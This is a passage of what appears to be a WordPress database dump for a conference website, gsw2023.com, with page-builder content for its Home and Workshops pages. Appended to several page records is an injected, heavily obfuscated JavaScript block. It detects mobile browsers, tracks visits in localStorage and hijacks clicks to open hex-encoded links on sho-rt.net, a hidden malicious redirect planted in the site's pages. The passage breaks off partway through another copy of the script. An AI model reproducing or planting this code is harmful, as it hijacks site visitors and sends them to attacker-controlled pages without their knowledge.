54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 00:40:08','2022-10-07 00:40:08','',2167,'https://gsw2023.com/?p=2368',0,'revision','',0),
(2372,1,'2022-10-07 02:01:51','2022-10-07 02:01:51','[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"14\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','publish','closed','closed','','workshops','','','2023-02-04 06:26:52','2023-02-04 06:26:52','',0,'https://gsw2023.com/?page_id=2372',40,'page','',0),
(2374,1,'2022-10-07 01:48:51','2022-10-07 01:48:51','','mmp','','inherit','open','closed','','mmp','','','2022-10-07 01:48:51','2022-10-07 01:48:51','',0,'https://gsw2023.com/wp-content/uploads/2020/05/mmp.jpg',0,'attachment','image/jpeg',0),
(2378,1,'2022-10-07 02:01:51','2022-10-07 02:01:51','[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 